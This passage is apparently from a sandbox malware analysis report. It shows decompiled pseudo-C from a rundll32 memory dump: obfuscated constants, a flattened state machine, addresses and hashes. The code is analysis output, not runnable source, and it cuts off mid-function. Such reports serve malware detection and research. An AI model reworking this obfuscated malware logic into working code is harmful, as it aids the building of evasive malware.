                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				unsigned int _v128;
                                                                                                                      				unsigned int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				void* _t373;
                                                                                                                      				signed int* _t377;
                                                                                                                      				signed int _t381;
                                                                                                                      				signed int _t383;
                                                                                                                      				signed int* _t384;
                                                                                                                      				void* _t385;
                                                                                                                      				intOrPtr _t396;
                                                                                                                      				signed int _t398;
                                                                                                                      				signed int _t399;
                                                                                                                      				signed int _t400;
                                                                                                                      				signed int _t401;
                                                                                                                      				signed int _t402;
                                                                                                                      				signed int _t403;
                                                                                                                      				signed int _t404;
                                                                                                                      				signed int _t405;
                                                                                                                      				signed int _t406;
                                                                                                                      				signed int _t407;
                                                                                                                      				signed int _t408;
                                                                                                                      				void* _t409;
                                                                                                                      				signed int* _t444;
                                                                                                                      				void* _t452;
                                                                                                                      				signed int* _t456;
                                                                                                                      
                                                                                                                      				_t456 =  &_v152;
                                                                                                                      				_v8 = 0x511491;
                                                                                                                      				_t396 = 0;
                                                                                                                      				_t452 = 0x68b0bf3;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v108 = 0xf5425d;
                                                                                                                      				_t398 = 0x24;
                                                                                                                      				_v108 = _v108 / _t398;
                                                                                                                      				_v108 = _v108 | 0xbb3a7fab;
                                                                                                                      				_v108 = _v108 ^ 0xbb3effbb;
                                                                                                                      				_v132 = 0xf54152;
                                                                                                                      				_v132 = _v132 + 0x73b9;
                                                                                                                      				_v132 = _v132 | 0x673a86bd;
                                                                                                                      				_v132 = _v132 >> 4;
                                                                                                                      				_v132 = _v132 ^ 0x067ffb7b;
                                                                                                                      				_v36 = 0x17d741;
                                                                                                                      				_v36 = _v36 << 0xe;
                                                                                                                      				_v36 = _v36 ^ 0xf5d04000;
                                                                                                                      				_v72 = 0xb99ed8;
                                                                                                                      				_t399 = 0x74;
                                                                                                                      				_v72 = _v72 * 0x57;
                                                                                                                      				_v72 = _v72 ^ 0x28cb8c28;
                                                                                                                      				_v72 = _v72 ^ 0x17df7740;
                                                                                                                      				_v100 = 0xb82182;
                                                                                                                      				_v100 = _v100 >> 2;
                                                                                                                      				_v100 = _v100 | 0xc07135d2;
                                                                                                                      				_v100 = _v100 ^ 0xc07f3df2;
                                                                                                                      				_v120 = 0x71fefc;
                                                                                                                      				_v120 = _v120 ^ 0x3c3b57cf;
                                                                                                                      				_v120 = _v120 ^ 0xde073c70;
                                                                                                                      				_v120 = _v120 + 0xffffefcb;
                                                                                                                      				_v120 = _v120 ^ 0xe24618f4;
                                                                                                                      				_v128 = 0x9b3c32;
                                                                                                                      				_v128 = _v128 >> 0xb;
                                                                                                                      				_v128 = _v128 ^ 0x48395a77;
                                                                                                                      				_v128 = _v128 >> 0xf;
                                                                                                                      				_v128 = _v128 ^ 0x000e9da5;
                                                                                                                      				_v136 = 0x52cc3f;
                                                                                                                      				_v136 = _v136 * 0x6b;
                                                                                                                      				_v136 = _v136 ^ 0x9c4f2321;
                                                                                                                      				_v136 = _v136 | 0xfd912896;
                                                                                                                      				_v136 = _v136 ^ 0xffd2684a;
                                                                                                                      				_v48 = 0x5298d7;
                                                                                                                      				_v48 = _v48 ^ 0x46ea6646;
                                                                                                                      				_v48 = _v48 ^ 0x46b0922b;
                                                                                                                      				_v112 = 0xeb4fde;
                                                                                                                      				_v112 = _v112 / _t399;
                                                                                                                      				_v112 = _v112 >> 0xc;
                                                                                                                      				_t400 = 0x56;
                                                                                                                      				_v112 = _v112 / _t400;
                                                                                                                      				_v112 = _v112 ^ 0x0003a7ac;
                                                                                                                      				_v52 = 0x2cac0;
                                                                                                                      				_v52 = _v52 + 0x2e2d;
                                                                                                                      				_v52 = _v52 ^ 0x00080243;
                                                                                                                      				_v124 = 0x3dbea4;
                                                                                                                      				_v124 = _v124 + 0x560a;
                                                                                                                      				_v124 = _v124 >> 0x10;
                                                                                                                      				_v124 = _v124 >> 9;
                                                                                                                      				_v124 = _v124 ^ 0x00027af4;
                                                                                                                      				_v56 = 0x4e9164;
                                                                                                                      				_v56 = _v56 >> 0xd;
                                                                                                                      				_v56 = _v56 ^ 0x00077014;
                                                                                                                      				_v28 = 0x1ac9f;
                                                                                                                      				_v28 = _v28 << 7;
                                                                                                                      				_v28 = _v28 ^ 0x00d40977;
                                                                                                                      				_v148 = 0xc87974;
                                                                                                                      				_t401 = 0xf;
                                                                                                                      				_v148 = _v148 / _t401;
                                                                                                                      				_v148 = _v148 + 0x3bc4;
                                                                                                                      				_v148 = _v148 >> 2;
                                                                                                                      				_v148 = _v148 ^ 0x0004ff8e;
                                                                                                                      				_v140 = 0x51bf99;
                                                                                                                      				_v140 = _v140 + 0x1f0d;
                                                                                                                      				_v140 = _v140 | 0x6ce4c515;
                                                                                                                      				_v140 = _v140 << 7;
                                                                                                                      				_v140 = _v140 ^ 0x7aef3c21;
                                                                                                                      				_v64 = 0x9041a6;
                                                                                                                      				_v64 = _v64 | 0xf9fd38a0;
                                                                                                                      				_v64 = _v64 + 0x56fc;
                                                                                                                      				_v64 = _v64 ^ 0xf9f31663;
                                                                                                                      				_v96 = 0xb1a19;
                                                                                                                      				_v96 = _v96 + 0x5234;
                                                                                                                      				_t402 = 0x68;
                                                                                                                      				_v96 = _v96 * 0x32;
                                                                                                                      				_v96 = _v96 ^ 0x0237c494;
                                                                                                                      				_v152 = 0x354a37;
                                                                                                                      				_v152 = _v152 | 0x37184972;
                                                                                                                      				_v152 = _v152 ^ 0x144b30cb;
                                                                                                                      				_v152 = _v152 * 0x1f;
                                                                                                                      				_v152 = _v152 ^ 0x4b54d1c6;
                                                                                                                      				_v116 = 0xf3726e;
                                                                                                                      				_v116 = _v116 + 0xcc69;
                                                                                                                      				_v116 = _v116 >> 3;
                                                                                                                      				_v116 = _v116 + 0x674b;
                                                                                                                      				_v116 = _v116 ^ 0x001624aa;
                                                                                                                      				_v44 = 0x3b88ac;
                                                                                                                      				_v44 = _v44 / _t402;
                                                                                                                      				_v44 = _v44 ^ 0x00096110;
                                                                                                                      				_v20 = 0x83fd7f;
                                                                                                                      				_v20 = _v20 ^ 0x5c57be60;
                                                                                                                      				_v20 = _v20 ^ 0x5cd84720;
                                                                                                                      				_v144 = 0x80ab55;
                                                                                                                      				_t403 = 0x46;
                                                                                                                      				_v144 = _v144 / _t403;
                                                                                                                      				_v144 = _v144 + 0xffffcaef;
                                                                                                                      				_v144 = _v144 + 0xffff67c3;
                                                                                                                      				_v144 = _v144 ^ 0x00052ea0;
                                                                                                                      				_v16 = 0xeb356a;
                                                                                                                      				_t199 =  &_v16; // 0xeb356a
                                                                                                                      				_t404 = 0x65;
                                                                                                                      				_v16 =  *_t199 / _t404;
                                                                                                                      				_v16 = _v16 ^ 0x000ce393;
                                                                                                                      				_v88 = 0xe75d2;
                                                                                                                      				_v88 = _v88 + 0xe1a2;
                                                                                                                      				_v88 = _v88 ^ 0xbfa107b7;
                                                                                                                      				_v88 = _v88 ^ 0xbfa92cf6;
                                                                                                                      				_v40 = 0xb57020;
                                                                                                                      				_t405 = 0x18;
                                                                                                                      				_v40 = _v40 / _t405;
                                                                                                                      				_v40 = _v40 ^ 0x000d9612;
                                                                                                                      				_v80 = 0xaa39d6;
                                                                                                                      				_t406 = 0x4c;
                                                                                                                      				_v80 = _v80 / _t406;
                                                                                                                      				_t407 = 0x4f;
                                                                                                                      				_v80 = _v80 / _t407;
                                                                                                                      				_v80 = _v80 ^ 0x000dd886;
                                                                                                                      				_v84 = 0x7565b2;
                                                                                                                      				_v84 = _v84 ^ 0x85e60cd2;
                                                                                                                      				_v84 = _v84 | 0xe2f126fa;
                                                                                                                      				_v84 = _v84 ^ 0xe7fbef1f;
                                                                                                                      				_v92 = 0x20921c;
                                                                                                                      				_v92 = _v92 << 0xf;
                                                                                                                      				_t408 = 0x3d;
                                                                                                                      				_v92 = _v92 / _t408;
                                                                                                                      				_v92 = _v92 ^ 0x0137fd8d;
                                                                                                                      				_v104 = 0x7d1988;
                                                                                                                      				_v104 = _v104 | 0x48f8c783;
                                                                                                                      				_v104 = _v104 * 0x2a;
                                                                                                                      				_v104 = _v104 >> 4;
                                                                                                                      				_v104 = _v104 ^ 0x0f9ace16;
                                                                                                                      				_v32 = 0xc6b5a4;
                                                                                                                      				_v32 = _v32 ^ 0x611852a0;
                                                                                                                      				_v32 = _v32 ^ 0x61d9018e;
                                                                                                                      				_v24 = 0x4e0063;
                                                                                                                      				_v24 = _v24 * 0x56;
                                                                                                                      				_v24 = _v24 ^ 0x1a371aa3;
                                                                                                                      				_v60 = 0xb39a6a;
                                                                                                                      				_v60 = _v60 + 0x379a;
                                                                                                                      				_v60 = _v60 << 0xb;
                                                                                                                      				_v60 = _v60 ^ 0x9e9cdd6f;
                                                                                                                      				_v68 = 0xe7ba26;
                                                                                                                      				_v68 = _v68 + 0xffffbb05;
                                                                                                                      				_v68 = _v68 ^ 0xbd703087;
                                                                                                                      				_v68 = _v68 ^ 0xbd98ca1c;
                                                                                                                      				_v76 = 0x8102f3;
                                                                                                                      				_v76 = _v76 << 6;
                                                                                                                      				_v76 = _v76 * 0x7c;
                                                                                                                      				_v76 = _v76 ^ 0x9f574684;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t444 =  *0x10025c90;
                                                                                                                      					_t373 = 0x882fd94;
                                                                                                                      					do {
                                                                                                                      						if(_t452 == 0x68b0bf3) {
                                                                                                                      							_push(_t408);
                                                                                                                      							_push(_t408);
                                                                                                                      							_t409 = 0x28;
                                                                                                                      							_t377 = E00822912(_t409);
                                                                                                                      							 *0x10025c90 = _t377;
                                                                                                                      							_t377[3] = 0x4000;
                                                                                                                      							_t325 =  &(( *0x10025c90)[3]); // 0x1a8e9
                                                                                                                      							_t381 = E00822912( *_t325);
                                                                                                                      							_t444 =  *0x10025c90;
                                                                                                                      							_t452 = 0xf7a4d1a;
                                                                                                                      							_t408 = _t381;
                                                                                                                      							_t326 =  &(_t444[3]); // 0x1a8e9
                                                                                                                      							_t383 =  *_t326 + _t408;
                                                                                                                      							__eflags = _t383;
                                                                                                                      							_t444[2] = _t408;
                                                                                                                      							_t444[1] = _t408;
                                                                                                                      							 *_t444 = _t408;
                                                                                                                      							_t444[5] = _t383;
                                                                                                                      							L12:
                                                                                                                      							_t373 = 0x882fd94;
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						if(_t452 == _t373) {
                                                                                                                      							_t384 =  *0x10025c90;
                                                                                                                      							_t312 =  &(_t384[2]); // 0x145d8908
                                                                                                                      							_t313 =  &(_t384[3]); // 0x1a8e9
                                                                                                                      							_t408 = _v20;
                                                                                                                      							_t385 = E0081BB95(_t408, _v144, _v36,  *_t313,  *_t312, _v12, _v16, _v88);
                                                                                                                      							_t456 =  &(_t456[6]);
                                                                                                                      							__eflags = _t385 - _v72;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								_t452 = 0xcb14d1c;
                                                                                                                      							} else {
                                                                                                                      								_t452 = 0xd2040d1;
                                                                                                                      								_t396 = 1;
                                                                                                                      							}
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						if(_t452 == 0xcb14d1c) {
                                                                                                                      							_t334 =  &(_t444[2]); // 0x145d8908
                                                                                                                      							E00815CDE(_v84, _v92, _v104, _v32,  *_t334);
                                                                                                                      							E00815CDE(_v24, _v60, _v68, _v76,  *0x10025c90);
                                                                                                                      							L17:
                                                                                                                      							return _t396;
                                                                                                                      						}
                                                                                                                      						if(_t452 == 0xd2040d1) {
                                                                                                                      							E00816427(_v40, _v100, _v12, _v80);
                                                                                                                      							goto L17;
                                                                                                                      						}
                                                                                                                      						_t463 = _t452 - 0xf7a4d1a;
                                                                                                                      						if(_t452 != 0xf7a4d1a) {
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						_push(_v148);
                                                                                                                      						_push(_v28);
                                                                                                                      						_push(0x10001324);
                                                                                                                      						E008202DA(0, _v108, _v140, E00819F66(_v124, _v56, _t463),  &_v12, _v64, _v96);
                                                                                                                      						_t408 = _v152;
                                                                                                                      						_t452 =  ==  ? 0x882fd94 : 0xcb14d1c;
                                                                                                                      						E0081A203(_t408, _v116, _v44, _t390);
                                                                                                                      						_t444 =  *0x10025c90;
                                                                                                                      						_t456 =  &(_t456[0xa]);
                                                                                                                      						goto L12;
                                                                                                                      						L13:
                                                                                                                      					} while (_t452 != 0xd072e76);
                                                                                                                      					goto L17;
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x00826dac
                                                                                                                      0x00826db4
                                                                                                                      0x00826dbc
                                                                                                                      0x00826dc4
                                                                                                                      0x00826dcc
                                                                                                                      0x00826dd4
                                                                                                                      0x00826dde
                                                                                                                      0x00826de2
                                                                                                                      0x00826dea
                                                                                                                      0x00826dea
                                                                                                                      0x00826dea
                                                                                                                      0x00826df0
                                                                                                                      0x00826df5
                                                                                                                      0x00826dfb
                                                                                                                      0x00826efa
                                                                                                                      0x00826efb
                                                                                                                      0x00826efe
                                                                                                                      0x00826eff
                                                                                                                      0x00826f04
                                                                                                                      0x00826f09
                                                                                                                      0x00826f25
                                                                                                                      0x00826f28
                                                                                                                      0x00826f2d
                                                                                                                      0x00826f33
                                                                                                                      0x00826f3a
                                                                                                                      0x00826f3c
                                                                                                                      0x00826f3f
                                                                                                                      0x00826f3f
                                                                                                                      0x00826f41
                                                                                                                      0x00826f44
                                                                                                                      0x00826f47
                                                                                                                      0x00826f49
                                                                                                                      0x00826f4c
                                                                                                                      0x00826f4c
                                                                                                                      0x00000000
                                                                                                                      0x00826f4c
                                                                                                                      0x00826e03
                                                                                                                      0x00826ea8
                                                                                                                      0x00826eb4
                                                                                                                      0x00826eb7
                                                                                                                      0x00826ec5
                                                                                                                      0x00826ecc
                                                                                                                      0x00826ed1
                                                                                                                      0x00826ed4
                                                                                                                      0x00826ed8
                                                                                                                      0x00826ee7
                                                                                                                      0x00826eda
                                                                                                                      0x00826edc
                                                                                                                      0x00826ee1
                                                                                                                      0x00826ee1
                                                                                                                      0x00000000
                                                                                                                      0x00826ed8
                                                                                                                      0x00826e0b
                                                                                                                      0x00826f7e
                                                                                                                      0x00826f94
                                                                                                                      0x00826fb5
                                                                                                                      0x00826fc0
                                                                                                                      0x00826fc9
                                                                                                                      0x00826fc9
                                                                                                                      0x00826e17
                                                                                                                      0x00826f75
                                                                                                                      0x00000000
                                                                                                                      0x00826f7b
                                                                                                                      0x00826e1d
                                                                                                                      0x00826e23
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00826e29
                                                                                                                      0x00826e2d
                                                                                                                      0x00826e3c
                                                                                                                      0x00826e63
                                                                                                                      0x00826e83
                                                                                                                      0x00826e87
                                                                                                                      0x00826e8a
                                                                                                                      0x00826e8f
                                                                                                                      0x00826e95
                                                                                                                      0x00000000
                                                                                                                      0x00826f51
                                                                                                                      0x00826f51
                                                                                                                      0x00000000
                                                                                                                      0x00826f5d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: V$!<z$-.$4R$7J5$FfF$Kg$c$j5$wZ9H
                                                                                                                      • API String ID: 0-218644068
                                                                                                                      • Opcode ID: 41da371709b23ce9d761cf5aa6c0d0b31592452060af55ea57f2db15f071c6e6
                                                                                                                      • Instruction ID: 695def47ff5b3f499ed02d6d31af7355d09787c3f7c069ab42897d91753899e1
                                                                                                                      • Opcode Fuzzy Hash: 41da371709b23ce9d761cf5aa6c0d0b31592452060af55ea57f2db15f071c6e6
                                                                                                                      • Instruction Fuzzy Hash: BF0221715083809FD3A8CF25D58A64BFBE2FBC4718F50891DF2998A261DBB58949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00815483(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				char _v256;
                                                                                                                      				char _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				signed int _v420;
                                                                                                                      				signed int _v424;
                                                                                                                      				void* _t385;
                                                                                                                      				void* _t420;
                                                                                                                      				void* _t428;
                                                                                                                      				void* _t430;
                                                                                                                      				intOrPtr _t439;
                                                                                                                      				intOrPtr _t447;
                                                                                                                      				intOrPtr _t448;
                                                                                                                      				signed int _t451;
                                                                                                                      				void* _t458;
                                                                                                                      				intOrPtr _t460;
                                                                                                                      				intOrPtr _t495;
                                                                                                                      				signed int _t502;
                                                                                                                      				signed int _t503;
                                                                                                                      				signed int _t504;
                                                                                                                      				signed int _t505;
                                                                                                                      				signed int _t506;
                                                                                                                      				signed int _t507;
                                                                                                                      				signed int _t508;
                                                                                                                      				signed int _t509;
                                                                                                                      				signed int _t510;
                                                                                                                      				signed int _t511;
                                                                                                                      				signed int _t512;
                                                                                                                      				signed int _t513;
                                                                                                                      				void* _t514;
                                                                                                                      				signed int* _t516;
                                                                                                                      				void* _t520;
                                                                                                                      
                                                                                                                      				_push(_a20);
                                                                                                                      				_t514 = __edx;
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0081C325(_t385);
                                                                                                                      				_v320 = 0x5bfd8;
                                                                                                                      				_t516 =  &(( &_v424)[7]);
                                                                                                                      				_v320 = _v320 ^ 0xae83e4b4;
                                                                                                                      				_v320 = _v320 + 0xffffbfdd;
                                                                                                                      				_t448 = 0;
                                                                                                                      				_v320 = _v320 ^ 0xae801261;
                                                                                                                      				_t451 = 0x4bae340;
                                                                                                                      				_v384 = 0x359b5d;
                                                                                                                      				_v384 = _v384 >> 9;
                                                                                                                      				_v384 = _v384 + 0x5a0;
                                                                                                                      				_v384 = _v384 ^ 0x40b7bf66;
                                                                                                                      				_v384 = _v384 ^ 0x40befa95;
                                                                                                                      				_v316 = 0x2933e6;
                                                                                                                      				_t502 = 0x13;
                                                                                                                      				_t504 = 0xf;
                                                                                                                      				_v316 = _v316 * 0x63;
                                                                                                                      				_v316 = _v316 ^ 0x0fe001ce;
                                                                                                                      				_v300 = 0x5708b8;
                                                                                                                      				_v300 = _v300 | 0xa16343bc;
                                                                                                                      				_v300 = _v300 ^ 0xa1786c90;
                                                                                                                      				_v308 = 0x5d4fad;
                                                                                                                      				_v308 = _v308 + 0xffffde8c;
                                                                                                                      				_v308 = _v308 ^ 0x0055ed4e;
                                                                                                                      				_v312 = 0x97068f;
                                                                                                                      				_v312 = _v312 >> 1;
                                                                                                                      				_v312 = _v312 ^ 0x0045ea4b;
                                                                                                                      				_v284 = 0xe9a634;
                                                                                                                      				_v284 = _v284 ^ 0x5bc7ef92;
                                                                                                                      				_v284 = _v284 ^ 0x5b2ed6c9;
                                                                                                                      				_v344 = 0xd52660;
                                                                                                                      				_v344 = _v344 + 0x6034;
                                                                                                                      				_v344 = _v344 >> 7;
                                                                                                                      				_v344 = _v344 ^ 0x000a9937;
                                                                                                                      				_v412 = 0x492529;
                                                                                                                      				_t55 =  &_v412; // 0x492529
                                                                                                                      				_v412 =  *_t55 * 0xa;
                                                                                                                      				_t57 =  &_v412; // 0x492529
                                                                                                                      				_v412 =  *_t57 / _t502;
                                                                                                                      				_t63 =  &_v412; // 0x492529
                                                                                                                      				_v412 =  *_t63 / _t504;
                                                                                                                      				_v412 = _v412 ^ 0x000522b4;
                                                                                                                      				_v360 = 0xff1035;
                                                                                                                      				_v360 = _v360 >> 5;
                                                                                                                      				_v360 = _v360 << 5;
                                                                                                                      				_v360 = _v360 ^ 0x00f6febc;
                                                                                                                      				_v352 = 0x24acbd;
                                                                                                                      				_v352 = _v352 >> 0xc;
                                                                                                                      				_v352 = _v352 * 0x36;
                                                                                                                      				_v352 = _v352 ^ 0x000a49b8;
                                                                                                                      				_v404 = 0x5e8a96;
                                                                                                                      				_v404 = _v404 >> 1;
                                                                                                                      				_v404 = _v404 / _t502;
                                                                                                                      				_v404 = _v404 + 0xffff7de4;
                                                                                                                      				_v404 = _v404 ^ 0x00019221;
                                                                                                                      				_v372 = 0xa45532;
                                                                                                                      				_v372 = _v372 + 0xffff1c48;
                                                                                                                      				_v372 = _v372 + 0xffffe0f0;
                                                                                                                      				_t505 = 0x6c;
                                                                                                                      				_v372 = _v372 * 0x6c;
                                                                                                                      				_v372 = _v372 ^ 0x44ea3f2c;
                                                                                                                      				_v380 = 0xf56085;
                                                                                                                      				_v380 = _v380 / _t505;
                                                                                                                      				_t506 = 0xd;
                                                                                                                      				_v380 = _v380 / _t506;
                                                                                                                      				_v380 = _v380 << 0xe;
                                                                                                                      				_v380 = _v380 ^ 0x0b2ea957;
                                                                                                                      				_v328 = 0x46776f;
                                                                                                                      				_v328 = _v328 + 0x15ec;
                                                                                                                      				_t507 = 0x1c;
                                                                                                                      				_v328 = _v328 * 0x5e;
                                                                                                                      				_v328 = _v328 ^ 0x19ebcb1f;
                                                                                                                      				_v388 = 0xfbc23f;
                                                                                                                      				_v388 = _v388 | 0xf6357e00;
                                                                                                                      				_v388 = _v388 + 0x8932;
                                                                                                                      				_v388 = _v388 ^ 0xf4ea365f;
                                                                                                                      				_v388 = _v388 ^ 0x03ea209f;
                                                                                                                      				_v336 = 0x730db6;
                                                                                                                      				_v336 = _v336 * 0x5b;
                                                                                                                      				_v336 = _v336 | 0x6492896b;
                                                                                                                      				_v336 = _v336 ^ 0x6cf77a3a;
                                                                                                                      				_v340 = 0x166b3b;
                                                                                                                      				_v340 = _v340 | 0x8c211161;
                                                                                                                      				_v340 = _v340 ^ 0x8c378fd9;
                                                                                                                      				_v396 = 0x9d5a93;
                                                                                                                      				_v396 = _v396 / _t507;
                                                                                                                      				_v396 = _v396 ^ 0xba861a50;
                                                                                                                      				_v396 = _v396 + 0xffff5b99;
                                                                                                                      				_v396 = _v396 ^ 0xba80e2b9;
                                                                                                                      				_v420 = 0x409c68;
                                                                                                                      				_t508 = 0x31;
                                                                                                                      				_v420 = _v420 / _t508;
                                                                                                                      				_v420 = _v420 >> 8;
                                                                                                                      				_t509 = 5;
                                                                                                                      				_v420 = _v420 * 0x16;
                                                                                                                      				_v420 = _v420 ^ 0x00013fee;
                                                                                                                      				_v296 = 0xc785e1;
                                                                                                                      				_v296 = _v296 ^ 0x791e03db;
                                                                                                                      				_v296 = _v296 ^ 0x79d79a97;
                                                                                                                      				_v364 = 0xad0976;
                                                                                                                      				_v364 = _v364 | 0x8850e8a8;
                                                                                                                      				_v364 = _v364 << 1;
                                                                                                                      				_v364 = _v364 ^ 0x11fb25d1;
                                                                                                                      				_v368 = 0x704a10;
                                                                                                                      				_v368 = _v368 + 0xffff0d6b;
                                                                                                                      				_v368 = _v368 << 2;
                                                                                                                      				_v368 = _v368 ^ 0x01b3e76e;
                                                                                                                      				_v288 = 0x54d2f6;
                                                                                                                      				_v288 = _v288 / _t509;
                                                                                                                      				_v288 = _v288 ^ 0x001edf05;
                                                                                                                      				_v392 = 0x949bbb;
                                                                                                                      				_v392 = _v392 + 0xbb88;
                                                                                                                      				_v392 = _v392 | 0xb3cb4dcc;
                                                                                                                      				_v392 = _v392 * 0x45;
                                                                                                                      				_v392 = _v392 ^ 0x7b348758;
                                                                                                                      				_v416 = 0x643691;
                                                                                                                      				_v416 = _v416 >> 9;
                                                                                                                      				_v416 = _v416 + 0xffff74a1;
                                                                                                                      				_t510 = 0x4e;
                                                                                                                      				_v416 = _v416 / _t510;
                                                                                                                      				_v416 = _v416 ^ 0x03464fba;
                                                                                                                      				_v356 = 0xeb775b;
                                                                                                                      				_v356 = _v356 + 0xdb8c;
                                                                                                                      				_v356 = _v356 >> 0x10;
                                                                                                                      				_v356 = _v356 ^ 0x0001ede4;
                                                                                                                      				_v304 = 0xc1e7b5;
                                                                                                                      				_v304 = _v304 + 0xf3ef;
                                                                                                                      				_v304 = _v304 ^ 0x00c2397a;
                                                                                                                      				_v376 = 0xa68bc9;
                                                                                                                      				_t511 = 0x43;
                                                                                                                      				_v376 = _v376 / _t511;
                                                                                                                      				_v376 = _v376 >> 8;
                                                                                                                      				_v376 = _v376 ^ 0x3383f04e;
                                                                                                                      				_v376 = _v376 ^ 0x3381e4d6;
                                                                                                                      				_v408 = 0x4d9cfa;
                                                                                                                      				_t512 = 0x46;
                                                                                                                      				_t503 = _v340;
                                                                                                                      				_v408 = _v408 * 0x6f;
                                                                                                                      				_v408 = _v408 + 0x3c4a;
                                                                                                                      				_v408 = _v408 << 2;
                                                                                                                      				_v408 = _v408 ^ 0x869e5b7f;
                                                                                                                      				_v324 = 0x71360b;
                                                                                                                      				_v324 = _v324 * 0xc;
                                                                                                                      				_v324 = _v324 ^ 0x901d1633;
                                                                                                                      				_v324 = _v324 ^ 0x9559eaf9;
                                                                                                                      				_v292 = 0x9a124c;
                                                                                                                      				_v292 = _v292 + 0x530b;
                                                                                                                      				_v292 = _v292 ^ 0x0097d0f0;
                                                                                                                      				_v424 = 0x6705b6;
                                                                                                                      				_v424 = _v424 ^ 0xd04d23dd;
                                                                                                                      				_v424 = _v424 << 4;
                                                                                                                      				_v424 = _v424 >> 0xa;
                                                                                                                      				_v424 = _v424 ^ 0x000c33e5;
                                                                                                                      				_v348 = 0x1e9503;
                                                                                                                      				_v348 = _v348 >> 3;
                                                                                                                      				_v348 = _v348 ^ 0x290fe667;
                                                                                                                      				_v348 = _v348 ^ 0x2908b2d4;
                                                                                                                      				_v400 = 0xb348f5;
                                                                                                                      				_v400 = _v400 ^ 0x711fc93f;
                                                                                                                      				_v400 = _v400 << 8;
                                                                                                                      				_v400 = _v400 * 0x58;
                                                                                                                      				_v400 = _v400 ^ 0x4c97e764;
                                                                                                                      				_v332 = 0xe64092;
                                                                                                                      				_t513 = _v340;
                                                                                                                      				_v332 = _v332 / _t512;
                                                                                                                      				_v332 = _v332 + 0x1e96;
                                                                                                                      				_v332 = _v332 ^ 0x00036ca6;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t420 = 0xee6d0ab;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t520 = _t451 - 0x77439d8;
                                                                                                                      							if(_t520 > 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							if(_t520 == 0) {
                                                                                                                      								E00815CDE(_v420, _v296, _v364, _v368, _v264);
                                                                                                                      								_t516 =  &(_t516[3]);
                                                                                                                      								_t451 = 0x2f9aadd;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t420 = 0xee6d0ab;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t451 == 0x195d899) {
                                                                                                                      									_t460 =  *0x10025214;
                                                                                                                      									_t343 = _t460 + 0x3c; // 0x10743e39
                                                                                                                      									_t439 =  *((intOrPtr*)( *_t343 + 0x58));
                                                                                                                      									 *((intOrPtr*)(_t460 + 0x38)) =  *((intOrPtr*)(_t460 + 0x38)) + 1;
                                                                                                                      									_t347 = _t460 + 0x38; // 0xc0330c71
                                                                                                                      									_t495 =  *_t347;
                                                                                                                      									 *((intOrPtr*)(_t460 + 0x3c)) = _t439;
                                                                                                                      									if(_t439 == 0) {
                                                                                                                      										_t349 = _t460 + 4; // 0x1004b8ac
                                                                                                                      										 *((intOrPtr*)(_t460 + 0x3c)) =  *_t349;
                                                                                                                      									}
                                                                                                                      									_t351 =  *0x10025214 + 0x44; // 0x56575757
                                                                                                                      									if(_t495 >=  *_t351) {
                                                                                                                      										 *( *0x10025214 + 0x38) =  *( *0x10025214 + 0x38) & 0x00000000;
                                                                                                                      									} else {
                                                                                                                      										_t451 = 0x4bae340;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
